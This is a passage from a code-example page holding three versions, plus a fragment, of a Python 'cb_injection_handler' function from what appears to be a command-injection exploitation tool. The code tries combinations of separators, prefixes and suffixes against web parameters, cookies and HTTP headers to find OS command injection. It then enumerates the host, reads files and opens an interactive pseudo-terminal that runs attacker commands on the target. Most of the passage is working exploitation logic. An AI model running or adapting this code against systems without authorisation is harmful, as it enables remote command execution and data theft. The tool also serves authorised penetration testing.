                percent = str(percent)+"%"
              sys.stdout.write("\r(*) Testing the "+ technique + "... " +  "[ " + percent + " ]")  
              sys.stdout.flush()
              
          except KeyboardInterrupt: 
            raise
          
          except:
            continue
          
          # Yaw, got shellz! 
          # Do some magic tricks!
          if shell:
            found = True
            no_result = False

            if settings.COOKIE_INJECTION == True: 
              http_request_method = "cookie"
              found_vuln_parameter = vuln_parameter
            else:
              if http_request_method == "GET":
                found_vuln_parameter = parameters.vuln_GET_param(url)
              else :
                found_vuln_parameter = vuln_parameter

            # Print the findings to log file.
            if export_injection_info == False:
              export_injection_info = logs.add_type_and_technique(export_injection_info, filename, injection_type, technique)
            if vp_flag == True:
              vp_flag = logs.add_parameter(vp_flag, filename, http_request_method, vuln_parameter, payload)
            logs.upload_payload(filename, counter, payload) 
            counter = counter + 1
            
            # Print the findings to terminal.
            print Style.BRIGHT + "\n(!) The ("+ http_request_method + ") '" + Style.UNDERLINE + found_vuln_parameter + Style.RESET_ALL + Style.BRIGHT + "' parameter is vulnerable to "+ injection_type +"."+ Style.RESET_ALL
            print "  (+) Type : "+ Fore.YELLOW + Style.BRIGHT + injection_type + Style.RESET_ALL + ""
            print "  (+) Technique : "+ Fore.YELLOW + Style.BRIGHT + technique.title() + Style.RESET_ALL + ""
            print "  (+) Payload : "+ Fore.YELLOW + Style.BRIGHT + re.sub("%20", " ", payload) + Style.RESET_ALL
              
            # Check for any enumeration options.
            cb_enumeration.do_check(separator, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell)

            # Check for any system file access options.
            cb_file_access.do_check(separator, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell)

            # Check if defined single cmd.
            if menu.options.os_cmd:
              cb_enumeration.single_os_cmd_exec(separator, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell)

            # Pseudo-Terminal shell
            go_back = False
            while True:
              if go_back == True:
                break
              gotshell = raw_input("\n(?) Do you want a Pseudo-Terminal shell? [Y/n] > ").lower()
              if gotshell in settings.CHOISE_YES:
                print ""
                print "Pseudo-Terminal (type '?' for shell options)"
                while True:
                  try:
                    cmd = raw_input("Shell > ")
                    if cmd.lower() in settings.SHELL_OPTIONS:
                      if cmd.lower() == "?":
                        menu.shell_options()
                      elif cmd.lower() == "quit":
                        logs.logs_notification(filename)
                        sys.exit(0)
                      elif cmd.lower() == "back":
                        go_back = True
                        break
                      else:
                        pass

                    else:
                      # Command execution results.
                      response = cb_injector.injection(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell)
                      
                      # if need page reload
                      if menu.options.url_reload:
                        time.sleep(delay)
                        response = urllib.urlopen(url)
                        
                      # Evaluate injection results.
                      shell = cb_injector.injection_results(response, TAG)
                      if shell:
                        shell = "".join(str(p) for p in shell)
                        if shell != "":
                          print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL + "\n"
                        else:
                          print "\n" + Back.RED + "(x) Error: The '" + cmd + "' command, does not return any output." + Style.RESET_ALL + "\n"

                  except KeyboardInterrupt: 
                    raise

              elif gotshell in settings.CHOISE_NO:
                if menu.options.verbose:
                  sys.stdout.write("\r(*) Continue testing the "+ technique +"... ")
                  sys.stdout.flush()
                break
              
              else:
                if gotshell == "":
                  gotshell = "enter"
                print Back.RED + "(x) Error: '" + gotshell + "' is not a valid answer." + Style.RESET_ALL
                pass
              
  if no_result == True:
    print ""
    return False
  else :
    sys.stdout.write("\r")
    sys.stdout.flush()
Ejemplo n.º 10
0
def cb_injection_handler(url,delay,filename,http_request_method):
  
  counter = 0
  vp_flag = True
  no_result = True
  is_encoded= False
  injection_type = "Results-based Command Injection"
  technique = "classic injection technique"
      
  sys.stdout.write( colors.BOLD + "(*) Testing the "+ technique + "... " + colors.RESET)
  sys.stdout.flush()
  
  # Print the findings to log file.
  output_file = open(filename + ".txt","a")
  output_file.write("\n---")
  output_file.write("\n(+) Type : " + injection_type)
  output_file.write("\n(+) Technique : " + technique.title())
  output_file.close()
  
  for whitespace in settings.WHITESPACES:
    for prefix in settings.PREFIXES:
      for suffix in settings.SUFFIXES:
	for separator in settings.SEPARATORS:
	  
	  # Check for bad combination of prefix and separator
	  combination = prefix + separator
	  if combination in settings.JUNK_COMBINATION:
	    prefix = ""

	  # Change TAG on every request to prevent false-positive resutls.
	  TAG = ''.join(random.choice(string.ascii_uppercase) for i in range(6))  
	  
	  # Check if defined "--base64" option.
	  if menu.options.base64_trick == True:
	    B64_ENC_TAG = base64.b64encode(TAG)
	    B64_DEC_TRICK = settings.B64_DEC_TRICK
	  else:
	    B64_ENC_TAG = TAG
	    B64_DEC_TRICK = ""
	    
	  try:
	    # Classic decision payload (check if host is vulnerable).
	    payload = cb_payloads.decision(separator,TAG,B64_ENC_TAG,B64_DEC_TRICK)
	    
	    # Check if defined "--prefix" option.
	    if menu.options.prefix:
	      prefix = menu.options.prefix
	      payload = prefix + payload
	    else:
	      payload = prefix + payload
	      
	    # Check if defined "--suffix" option.
	    if menu.options.suffix:
	      suffix = menu.options.suffix
	      payload = payload + suffix
	    else:
	      payload = payload + suffix

	    if separator == " " :
	      payload = re.sub(" ","%20",payload)
	    else:
	      payload = re.sub(" ",whitespace,payload)

	    # Check if defined "--verbose" option.
	    if menu.options.verbose:
	      sys.stdout.write("\n" + colors.GREY + payload + colors.RESET)
	      
	    # Check if target host is vulnerable.
	    response,vuln_parameter = cb_injector.injection_test(payload,http_request_method,url)

	    # if need page reload
	    if menu.options.url_reload:
	      time.sleep(delay)
	      response = urllib.urlopen(url)
	      
	    # Evaluate test results.
	    shell = cb_injector.injection_test_results(response,TAG)
	    
	  except:
	    continue
	  
	  # Yaw, got shellz! 
	  # Do some magic tricks!
	  if shell:
	    found = True
	    no_result = False
	    
	    if http_request_method == "GET":
	      # Print the findings to log file
	      if vp_flag == True:
		output_file = open(filename + ".txt","a")
		output_file.write("\n(+) Parameter : " + vuln_parameter + " (" + http_request_method + ")")
		output_file.write("\n---\n")
		vp_flag = False
		output_file.close()
		
	      counter = counter + 1
	      output_file = open(filename + ".txt","a")
	      output_file.write("  ("+str(counter)+") Payload : "+ re.sub("%20"," ",payload) + "\n")
	      output_file.close()
	      
	      # Print the findings to terminal.
	      print colors.BOLD + "\n(!) The ("+ http_request_method + ") '" + vuln_parameter +"' parameter is vulnerable to "+ injection_type +"."+ colors.RESET
	      print "  (+) Type : "+ colors.YELLOW + colors.BOLD + injection_type + colors.RESET + ""
	      print "  (+) Technique : "+ colors.YELLOW + colors.BOLD + technique.title() + colors.RESET + ""
	      print "  (+) Parameter : "+ colors.YELLOW + colors.BOLD + vuln_parameter + colors.RESET + ""
	      print "  (+) Payload : "+ colors.YELLOW + colors.BOLD + re.sub("%20"," ",payload) + colors.RESET

	    else :
	      # Print the findings to log file
	      if vp_flag == True:
		output_file = open(filename + ".txt","a")
		output_file.write("\n(+) Parameter : " + vuln_parameter + " (" + http_request_method + ")")
		output_file.write("\n---\n")
		vp_flag = False
		output_file.close()
		
	      counter = counter + 1
	      output_file = open(filename + ".txt","a")
	      output_file.write("  ("+str(counter)+") Payload : "+ re.sub("%20"," ",payload) + "\n")
	      output_file.close()
	      
	      # Print the findings to terminal.
	      print colors.BOLD + "\n(!) The ("+ http_request_method + ") '" + vuln_parameter +"' parameter is vulnerable to "+ injection_type +"."+ colors.RESET
	      print "  (+) Type : "+ colors.YELLOW + colors.BOLD + injection_type + colors.RESET + ""
	      print "  (+) Technique : "+ colors.YELLOW + colors.BOLD + technique.title() + colors.RESET + ""
	      print "  (+) Parameter : "+ colors.YELLOW + colors.BOLD + vuln_parameter + colors.RESET + ""
	      print "  (+) Payload : "+ colors.YELLOW + colors.BOLD + re.sub("%20"," ",payload) + colors.RESET
	      
	    # Check for any enumeration options.
	    cb_enumeration.do_check(separator,TAG,prefix,suffix,whitespace,http_request_method,url,vuln_parameter)
	    
	    # Pseudo-Terminal shell
	    gotshell = raw_input("\n(*) Do you want a Pseudo-Terminal shell? [Y/n] > ").lower()
	    if gotshell in settings.CHOISE_YES:
	      print ""
	      print "Pseudo-Terminal (type 'q' or use <Ctrl-C> to quit)"
	      while True:
		try:
		  cmd = raw_input("Shell > ")
		  if cmd == "q":
		    sys.exit(0)
		    
		  else:
		    # The main command injection exploitation.
		    response = cb_injector.injection(separator,TAG,cmd,prefix,suffix,whitespace,http_request_method,url,vuln_parameter)
		    
		    # if need page reload
		    if menu.options.url_reload:
		      time.sleep(delay)
		      response = urllib.urlopen(url)
		      
		    # Command execution results.
		    shell = cb_injector.injection_results(response,TAG)
		    if shell:
		      shell = "".join(str(p) for p in shell)
		      print "\n" + colors.GREEN + colors.BOLD + shell + colors.RESET + "\n"

		except KeyboardInterrupt: 
		  print ""
		  sys.exit(0)
	      
	    else:
	      print "(*) Continue testing the "+ technique +"... "
	      pass

  if no_result == True:
    if menu.options.verbose == False:
      print "[" + colors.RED + " FAILED "+colors.RESET+"]"
  
    else:
      print ""
    
    return False
  
  else :
    print ""
Ejemplo n.º 11
0
def cb_injection_handler(url, delay, filename, http_request_method):

    counter = 0
    vp_flag = True
    no_result = True
    is_encoded = False
    injection_type = "Results-based Command Injection"
    technique = "classic injection technique"

    sys.stdout.write(colors.BOLD + "(*) Testing the " + technique + "... " +
                     colors.RESET)
    sys.stdout.flush()

    # Print the findings to log file.
    output_file = open(filename + ".txt", "a")
    output_file.write("\n---")
    output_file.write("\n(+) Type : " + injection_type)
    output_file.write("\n(+) Technique : " + technique.title())
    output_file.close()

    for whitespace in settings.WHITESPACES:
        for prefix in settings.PREFIXES:
            for suffix in settings.SUFFIXES:
                for separator in settings.SEPARATORS:

                    # Check for bad combination of prefix and separator
                    combination = prefix + separator
                    if combination in settings.JUNK_COMBINATION:
                        prefix = ""

                    # Change TAG on every request to prevent false-positive resutls.
                    TAG = ''.join(
                        random.choice(string.ascii_uppercase)
                        for i in range(6))

                    # Check if defined "--base64" option.
                    if menu.options.base64_trick == True:
                        B64_ENC_TAG = base64.b64encode(TAG)
                        B64_DEC_TRICK = settings.B64_DEC_TRICK
                    else:
                        B64_ENC_TAG = TAG
                        B64_DEC_TRICK = ""

                    try:
                        # Classic decision payload (check if host is vulnerable).
                        payload = cb_payloads.decision(separator, TAG,
                                                       B64_ENC_TAG,
                                                       B64_DEC_TRICK)

                        # Check if defined "--prefix" option.
                        if menu.options.prefix:
                            prefix = menu.options.prefix
                            payload = prefix + payload
                        else:
                            payload = prefix + payload

                        # Check if defined "--suffix" option.
                        if menu.options.suffix:
                            suffix = menu.options.suffix
                            payload = payload + suffix
                        else:
                            payload = payload + suffix

                        if separator == " ":
                            payload = re.sub(" ", "%20", payload)
                        else:
                            payload = re.sub(" ", whitespace, payload)

                        # Check if defined "--verbose" option.
                        if menu.options.verbose:
                            sys.stdout.write("\n" + colors.GREY + payload +
                                             colors.RESET)

                        # Check if target host is vulnerable.
                        response, vuln_parameter = cb_injector.injection_test(
                            payload, http_request_method, url)

                        # if need page reload
                        if menu.options.url_reload:
                            time.sleep(delay)
                            response = urllib.urlopen(url)

                        # Evaluate test results.
                        shell = cb_injector.injection_test_results(
                            response, TAG)

                    except:
                        continue

                    # Yaw, got shellz!
                    # Do some magic tricks!
                    if shell:
                        found = True
                        no_result = False

                        if http_request_method == "GET":
                            # Print the findings to log file
                            if vp_flag == True:
                                output_file = open(filename + ".txt", "a")
                                output_file.write("\n(+) Parameter : " +
                                                  vuln_parameter + " (" +
                                                  http_request_method + ")")
                                output_file.write("\n---\n")
                                vp_flag = False
                                output_file.close()

                            counter = counter + 1
                            output_file = open(filename + ".txt", "a")
                            output_file.write("  (" + str(counter) +
                                              ") Payload : " +
                                              re.sub("%20", " ", payload) +
                                              "\n")
                            output_file.close()

                            # Print the findings to terminal.
                            print colors.BOLD + "\n(!) The (" + http_request_method + ") '" + vuln_parameter + "' parameter is vulnerable to " + injection_type + "." + colors.RESET
                            print "  (+) Type : " + colors.YELLOW + colors.BOLD + injection_type + colors.RESET + ""
                            print "  (+) Technique : " + colors.YELLOW + colors.BOLD + technique.title(
                            ) + colors.RESET + ""
                            print "  (+) Parameter : " + colors.YELLOW + colors.BOLD + vuln_parameter + colors.RESET + ""
                            print "  (+) Payload : " + colors.YELLOW + colors.BOLD + re.sub(
                                "%20", " ", payload) + colors.RESET

                        else:
                            # Print the findings to log file
                            if vp_flag == True:
                                output_file = open(filename + ".txt", "a")
                                output_file.write("\n(+) Parameter : " +
                                                  vuln_parameter + " (" +
                                                  http_request_method + ")")
                                output_file.write("\n---\n")
                                vp_flag = False
                                output_file.close()

                            counter = counter + 1
                            output_file = open(filename + ".txt", "a")
                            output_file.write("  (" + str(counter) +
                                              ") Payload : " +
                                              re.sub("%20", " ", payload) +
                                              "\n")
                            output_file.close()

                            # Print the findings to terminal.
                            print colors.BOLD + "\n(!) The (" + http_request_method + ") '" + vuln_parameter + "' parameter is vulnerable to " + injection_type + "." + colors.RESET
                            print "  (+) Type : " + colors.YELLOW + colors.BOLD + injection_type + colors.RESET + ""
                            print "  (+) Technique : " + colors.YELLOW + colors.BOLD + technique.title(
                            ) + colors.RESET + ""
                            print "  (+) Parameter : " + colors.YELLOW + colors.BOLD + vuln_parameter + colors.RESET + ""
                            print "  (+) Payload : " + colors.YELLOW + colors.BOLD + re.sub(
                                "%20", " ", payload) + colors.RESET

                        # Check for any enumeration options.
                        cb_enumeration.do_check(separator, TAG, prefix, suffix,
                                                whitespace,
                                                http_request_method, url,
                                                vuln_parameter)

                        # Pseudo-Terminal shell
                        gotshell = raw_input(
                            "\n(*) Do you want a Pseudo-Terminal shell? [Y/n] > "
                        )
                        if gotshell == "Y" or gotshell == "y":
                            print ""
                            print "Pseudo-Terminal (type 'q' or use <Ctrl-C> to quit)"
                            while True:
                                try:
                                    cmd = raw_input("Shell > ")
                                    if cmd == "q":
                                        sys.exit(0)

                                    else:
                                        # The main command injection exploitation.
                                        response = cb_injector.injection(
                                            separator, TAG, cmd, prefix,
                                            suffix, whitespace,
                                            http_request_method, url,
                                            vuln_parameter)

                                        # if need page reload
                                        if menu.options.url_reload:
                                            time.sleep(delay)
                                            response = urllib.urlopen(url)

                                        # Command execution results.
                                        shell = cb_injector.injection_results(
                                            response, TAG)
                                        if shell:
                                            shell = "".join(
                                                str(p) for p in shell)
                                            print "\n" + colors.GREEN + colors.BOLD + shell + colors.RESET + "\n"

                                except KeyboardInterrupt:
                                    print ""
                                    sys.exit(0)

                        else:
                            print "(*) Continue testing the " + technique + "... "
                            pass

    if no_result == True:
        if menu.options.verbose == False:
            print "[" + colors.RED + " FAILED " + colors.RESET + "]"

        else:
            print ""

        return False

    else:
        print ""
Ejemplo n.º 12
0
def cb_injection_handler(url, timesec, filename, http_request_method,
                         injection_type, technique):
    shell = False
    counter = 1
    vp_flag = True
    no_result = True
    is_encoded = False
    export_injection_info = False

    if not settings.LOAD_SESSION:
        info_msg = "Testing the " + "(" + injection_type.split(
            " ")[0] + ") " + technique + ". "
        sys.stdout.write(settings.print_info_msg(info_msg))
        sys.stdout.flush()
        if settings.VERBOSITY_LEVEL != 0:
            print(settings.SINGLE_WHITESPACE)

    i = 0
    # Calculate all possible combinations
    total = len(settings.WHITESPACES) * len(settings.PREFIXES) * len(
        settings.SEPARATORS) * len(settings.SUFFIXES)
    for whitespace in settings.WHITESPACES:
        for prefix in settings.PREFIXES:
            for suffix in settings.SUFFIXES:
                for separator in settings.SEPARATORS:
                    if whitespace == " ":
                        whitespace = _urllib.parse.quote(whitespace)
                    # Check injection state
                    settings.DETECTION_PHASE = True
                    settings.EXPLOITATION_PHASE = False
                    # If a previous session is available.
                    if settings.LOAD_SESSION and session_handler.notification(
                            url, technique, injection_type):
                        try:
                            settings.CLASSIC_STATE = True
                            url, technique, injection_type, separator, shell, vuln_parameter, prefix, suffix, TAG, alter_shell, payload, http_request_method, url_time_response, timesec, how_long, output_length, is_vulnerable = session_handler.injection_point_exportation(
                                url, http_request_method)
                            checks.check_for_stored_tamper(payload)
                        except TypeError:
                            err_msg = "An error occurred while accessing session file ('"
                            err_msg += settings.SESSION_FILE + "'). "
                            err_msg += "Use the '--flush-session' option."
                            print(settings.print_critical_msg(err_msg))
                            raise SystemExit()

                    else:
                        i = i + 1
                        # Check for bad combination of prefix and separator
                        combination = prefix + separator
                        if combination in settings.JUNK_COMBINATION:
                            prefix = ""

                        # Change TAG on every request to prevent false-positive results.
                        TAG = ''.join(
                            random.choice(string.ascii_uppercase)
                            for i in range(6))

                        randv1 = random.randrange(100)
                        randv2 = random.randrange(100)
                        randvcalc = randv1 + randv2

                        # Define alter shell
                        alter_shell = menu.options.alter_shell

                        try:
                            if alter_shell:
                                # Classic -alter shell- decision payload (check if host is vulnerable).
                                payload = cb_payloads.decision_alter_shell(
                                    separator, TAG, randv1, randv2)
                            else:
                                # Classic decision payload (check if host is vulnerable).
                                payload = cb_payloads.decision(
                                    separator, TAG, randv1, randv2)

                            # Define prefixes & suffixes
                            payload = parameters.prefixes(payload, prefix)
                            payload = parameters.suffixes(payload, suffix)

                            # Whitespace fixation
                            payload = payload.replace(
                                settings.SINGLE_WHITESPACE, whitespace)

                            # Perform payload modification
                            payload = checks.perform_payload_modification(
                                payload)

                            # Check if defined "--verbose" option.
                            if settings.VERBOSITY_LEVEL == 1:
                                print(settings.print_payload(payload))
                            elif settings.VERBOSITY_LEVEL >= 2:
                                debug_msg = "Generating payload for the injection."
                                print(settings.print_debug_msg(debug_msg))
                                print(settings.print_payload(payload))

                            # Cookie header injection
                            if settings.COOKIE_INJECTION == True:
                                # Check if target host is vulnerable to cookie header injection.
                                vuln_parameter = parameters.specify_cookie_parameter(
                                    menu.options.cookie)
                                response = cb_injector.cookie_injection_test(
                                    url, vuln_parameter, payload)

                            # User-Agent HTTP header injection
                            elif settings.USER_AGENT_INJECTION == True:
                                # Check if target host is vulnerable to user-agent HTTP header injection.
                                vuln_parameter = parameters.specify_user_agent_parameter(
                                    menu.options.agent)
                                response = cb_injector.user_agent_injection_test(
                                    url, vuln_parameter, payload)

                            # Referer HTTP header injection
                            elif settings.REFERER_INJECTION == True:
                                # Check if target host is vulnerable to referer HTTP header injection.
                                vuln_parameter = parameters.specify_referer_parameter(
                                    menu.options.referer)
                                response = cb_injector.referer_injection_test(
                                    url, vuln_parameter, payload)

                            # Host HTTP header injection
                            elif settings.HOST_INJECTION == True:
                                # Check if target host is vulnerable to host HTTP header injection.
                                vuln_parameter = parameters.specify_host_parameter(
                                    menu.options.host)
                                response = cb_injector.host_injection_test(
                                    url, vuln_parameter, payload)

                            # Custom HTTP header Injection
                            elif settings.CUSTOM_HEADER_INJECTION == True:
                                # Check if target host is vulnerable to custom http header injection.
                                vuln_parameter = parameters.specify_custom_header_parameter(
                                    settings.INJECT_TAG)
                                response = cb_injector.custom_header_injection_test(
                                    url, vuln_parameter, payload)

                            else:
                                # Check if target host is vulnerable.
                                response, vuln_parameter = cb_injector.injection_test(
                                    payload, http_request_method, url)

                            # Try target page reload (if it is required).
                            if settings.URL_RELOAD:
                                response = requests.url_reload(url, timesec)

                            # Evaluate test results.
                            time.sleep(timesec)
                            shell = cb_injector.injection_test_results(
                                response, TAG, randvcalc)

                            if settings.VERBOSITY_LEVEL == 0:
                                percent = ((i * 100) / total)
                                float_percent = "{0:.1f}".format(
                                    round(((i * 100) / (total * 1.0)), 2))

                                if shell == False:
                                    info_msg = "Testing the " + "(" + injection_type.split(
                                        " "
                                    )[0] + ") " + technique + "." + " (" + str(
                                        float_percent) + "%)"
                                    sys.stdout.write(
                                        "\r" +
                                        settings.print_info_msg(info_msg))
                                    sys.stdout.flush()

                                if float(float_percent) >= 99.9:
                                    if no_result == True:
                                        percent = settings.FAIL_STATUS
                                    else:
                                        percent = ".. (" + str(
                                            float_percent) + "%)"
                                elif len(shell) != 0:
                                    percent = settings.info_msg
                                else:
                                    percent = ".. (" + str(
                                        float_percent) + "%)"
                                info_msg = "Testing the " + "(" + injection_type.split(
                                    " "
                                )[0] + ") " + technique + "." + "" + percent + ""
                                sys.stdout.write(
                                    "\r" + settings.print_info_msg(info_msg))
                                sys.stdout.flush()

                        except KeyboardInterrupt:
                            raise

                        except SystemExit:
                            raise

                        except EOFError:
                            err_msg = "Exiting, due to EOFError."
                            print(settings.print_error_msg(err_msg))
                            raise

                        except:
                            continue

                    # Yaw, got shellz!
                    # Do some magic tricks!
                    if shell:
                        found = True
                        no_result = False
                        # Check injection state
                        settings.DETECTION_PHASE = False
                        settings.EXPLOITATION_PHASE = True
                        if settings.COOKIE_INJECTION == True:
                            header_name = " cookie"
                            found_vuln_parameter = vuln_parameter
                            the_type = " parameter"

                        elif settings.USER_AGENT_INJECTION == True:
                            header_name = " User-Agent"
                            found_vuln_parameter = ""
                            the_type = " HTTP header"

                        elif settings.REFERER_INJECTION == True:
                            header_name = " Referer"
                            found_vuln_parameter = ""
                            the_type = " HTTP header"

                        elif settings.HOST_INJECTION == True:
                            header_name = " Host"
                            found_vuln_parameter = ""
                            the_type = " HTTP header"

                        elif settings.CUSTOM_HEADER_INJECTION == True:
                            header_name = " " + settings.CUSTOM_HEADER_NAME
                            found_vuln_parameter = ""
                            the_type = " HTTP header"

                        else:
                            header_name = ""
                            the_type = " parameter"
                            # Check if defined POST data
                            if not settings.USER_DEFINED_POST_DATA:
                                found_vuln_parameter = parameters.vuln_GET_param(
                                    url)
                            else:
                                found_vuln_parameter = vuln_parameter

                        if len(found_vuln_parameter) != 0:
                            found_vuln_parameter = " '" + found_vuln_parameter + Style.RESET_ALL + Style.BRIGHT + "'"

                        # Print the findings to log file.
                        if export_injection_info == False:
                            export_injection_info = logs.add_type_and_technique(
                                export_injection_info, filename,
                                injection_type, technique)
                        if vp_flag == True:
                            vp_flag = logs.add_parameter(
                                vp_flag, filename, the_type, header_name,
                                http_request_method, vuln_parameter, payload)
                        logs.update_payload(filename, counter, payload)
                        counter = counter + 1

                        if not settings.LOAD_SESSION:
                            if settings.VERBOSITY_LEVEL == 0:
                                print(settings.SINGLE_WHITESPACE)
                            else:
                                checks.total_of_requests()

                        # Print the findings to terminal.
                        info_msg = "The"
                        if len(found_vuln_parameter
                               ) > 0 and not "cookie" in header_name:
                            info_msg += " " + http_request_method + ""
                        info_msg += ('', ' (JSON)')[settings.IS_JSON] + (
                            '', ' (SOAP/XML)'
                        )[settings.IS_XML] + the_type + header_name
                        info_msg += found_vuln_parameter + " seems injectable via "
                        info_msg += "(" + injection_type.split(
                            " ")[0] + ") " + technique + "."
                        print(settings.print_bold_info_msg(info_msg))
                        sub_content = str(checks.url_decode(payload))
                        print(settings.print_sub_content(sub_content))
                        # Export session
                        if not settings.LOAD_SESSION:
                            session_handler.injection_point_importation(
                                url,
                                technique,
                                injection_type,
                                separator,
                                shell[0],
                                vuln_parameter,
                                prefix,
                                suffix,
                                TAG,
                                alter_shell,
                                payload,
                                http_request_method,
                                url_time_response=0,
                                timesec=0,
                                how_long=0,
                                output_length=0,
                                is_vulnerable=menu.options.level)
                        else:
                            whitespace = settings.WHITESPACES[0]
                            settings.LOAD_SESSION = False

                        # Check for any enumeration options.
                        new_line = True
                        if settings.ENUMERATION_DONE == True:
                            while True:
                                if not menu.options.batch:
                                    question_msg = "Do you want to enumerate again? [Y/n] > "
                                    enumerate_again = _input(
                                        "\n" + settings.print_question_msg(
                                            question_msg)).lower()
                                else:
                                    enumerate_again = ""
                                if len(enumerate_again) == 0:
                                    enumerate_again = "Y"
                                if enumerate_again in settings.CHOICE_YES:
                                    cb_enumeration.do_check(
                                        separator, TAG, prefix, suffix,
                                        whitespace, http_request_method, url,
                                        vuln_parameter, alter_shell, filename,
                                        timesec)
                                    #print(settings.SINGLE_WHITESPACE)
                                    break
                                elif enumerate_again in settings.CHOICE_NO:
                                    new_line = False
                                    break
                                elif enumerate_again in settings.CHOICE_QUIT:
                                    raise SystemExit()
                                else:
                                    err_msg = "'" + enumerate_again + "' is not a valid answer."
                                    print(settings.print_error_msg(err_msg))
                                    pass
                        else:
                            if menu.enumeration_options():
                                cb_enumeration.do_check(
                                    separator, TAG, prefix, suffix, whitespace,
                                    http_request_method, url, vuln_parameter,
                                    alter_shell, filename, timesec)

                        if not menu.file_access_options(
                        ) and not menu.options.os_cmd and new_line:
                            print(settings.SINGLE_WHITESPACE)

                        # Check for any system file access options.
                        if settings.FILE_ACCESS_DONE == True:
                            if settings.ENUMERATION_DONE != True:
                                print(settings.SINGLE_WHITESPACE)
                            while True:
                                if not menu.options.batch:
                                    question_msg = "Do you want to access files again? [Y/n] > "
                                    file_access_again = _input(
                                        settings.print_question_msg(
                                            question_msg))
                                else:
                                    file_access_again = ""
                                if len(file_access_again) == 0:
                                    file_access_again = "Y"
                                if file_access_again in settings.CHOICE_YES:
                                    cb_file_access.do_check(
                                        separator, TAG, prefix, suffix,
                                        whitespace, http_request_method, url,
                                        vuln_parameter, alter_shell, filename,
                                        timesec)
                                    print(settings.SINGLE_WHITESPACE)
                                    break
                                elif file_access_again in settings.CHOICE_NO:
                                    break
                                elif file_access_again in settings.CHOICE_QUIT:
                                    raise SystemExit()
                                else:
                                    err_msg = "'" + file_access_again + "' is not a valid answer."
                                    print(settings.print_error_msg(err_msg))
                                    pass
                        else:
                            if menu.file_access_options():
                                # if not menu.enumeration_options():
                                #   print(settings.SINGLE_WHITESPACE)
                                cb_file_access.do_check(
                                    separator, TAG, prefix, suffix, whitespace,
                                    http_request_method, url, vuln_parameter,
                                    alter_shell, filename, timesec)
                                print(settings.SINGLE_WHITESPACE)

                        # Check if defined single cmd.
                        if menu.options.os_cmd:
                            # if not menu.file_access_options():
                            #   print(settings.SINGLE_WHITESPACE)
                            cb_enumeration.single_os_cmd_exec(
                                separator, TAG, prefix, suffix, whitespace,
                                http_request_method, url, vuln_parameter,
                                alter_shell, filename, timesec)

                        # Pseudo-Terminal shell
                        go_back = False
                        go_back_again = False
                        while True:
                            if go_back == True:
                                break
                            if not menu.options.batch:
                                question_msg = "Do you want a Pseudo-Terminal shell? [Y/n] > "
                                gotshell = _input(
                                    settings.print_question_msg(question_msg))
                            else:
                                gotshell = ""
                            if len(gotshell) == 0:
                                gotshell = "Y"
                            if gotshell in settings.CHOICE_YES:
                                # if not menu.options.batch:
                                #   print(settings.SINGLE_WHITESPACE)
                                print("Pseudo-Terminal (type '" +
                                      Style.BRIGHT + "?" + Style.RESET_ALL +
                                      "' for available options)")
                                if settings.READLINE_ERROR:
                                    checks.no_readline_module()
                                while True:
                                    try:
                                        if not settings.READLINE_ERROR:
                                            checks.tab_autocompleter()
                                        sys.stdout.write(settings.OS_SHELL)
                                        cmd = _input()
                                        cmd = checks.escaped_cmd(cmd)
                                        if cmd.lower(
                                        ) in settings.SHELL_OPTIONS:
                                            go_back, go_back_again = shell_options.check_option(
                                                separator,
                                                TAG,
                                                cmd,
                                                prefix,
                                                suffix,
                                                whitespace,
                                                http_request_method,
                                                url,
                                                vuln_parameter,
                                                alter_shell,
                                                filename,
                                                technique,
                                                go_back,
                                                no_result,
                                                timesec,
                                                go_back_again,
                                                payload,
                                                OUTPUT_TEXTFILE="")
                                            if go_back and go_back_again == False:
                                                break
                                            if go_back and go_back_again:
                                                return True
                                        else:
                                            # Command execution results.
                                            time.sleep(timesec)
                                            response = cb_injector.injection(
                                                separator, TAG, cmd, prefix,
                                                suffix, whitespace,
                                                http_request_method, url,
                                                vuln_parameter, alter_shell,
                                                filename)
                                            # Try target page reload (if it is required).
                                            if settings.URL_RELOAD:
                                                response = requests.url_reload(
                                                    url, timesec)
                                            if menu.options.ignore_session or \
                                               session_handler.export_stored_cmd(url, cmd, vuln_parameter) == None:
                                                # Evaluate injection results.
                                                try:
                                                    shell = cb_injector.injection_results(
                                                        response, TAG, cmd)
                                                    shell = "".join(
                                                        str(p) for p in shell)
                                                except:
                                                    print(settings.
                                                          SINGLE_WHITESPACE)
                                                    continue
                                                if not menu.options.ignore_session:
                                                    session_handler.store_cmd(
                                                        url, cmd, shell,
                                                        vuln_parameter)
                                            else:
                                                shell = session_handler.export_stored_cmd(
                                                    url, cmd, vuln_parameter)
                                            if shell:
                                                shell = unescape(shell)
                                                # Update logs with executed cmds and execution results.
                                                logs.executed_command(
                                                    filename, cmd, shell)
                                            if shell != "":
                                                print("\n" + Fore.GREEN +
                                                      Style.BRIGHT + shell +
                                                      Style.RESET_ALL + "\n")
                                            else:
                                                if settings.VERBOSITY_LEVEL != 0:
                                                    print(settings.
                                                          SINGLE_WHITESPACE)
                                                err_msg = "The '" + cmd + "' command, does not return any output."
                                                print(
                                                    settings.
                                                    print_critical_msg(
                                                        err_msg) + "\n")

                                    except KeyboardInterrupt:
                                        raise

                                    except SystemExit:
                                        raise

                                    except EOFError:
                                        err_msg = "Exiting, due to EOFError."
                                        print(
                                            settings.print_error_msg(err_msg))
                                        raise

                            elif gotshell in settings.CHOICE_NO:
                                if checks.next_attack_vector(
                                        technique, go_back) == True:
                                    break
                                else:
                                    if no_result == True:
                                        return False
                                    else:
                                        return True

                            elif gotshell in settings.CHOICE_QUIT:
                                raise SystemExit()

                            else:
                                err_msg = "'" + gotshell + "' is not a valid answer."
                                print(settings.print_error_msg(err_msg))
                                pass

    if no_result == True:
        if settings.VERBOSITY_LEVEL == 0:
            print(settings.SINGLE_WHITESPACE)
        return False
    else:
        sys.stdout.write("\r")
        sys.stdout.flush()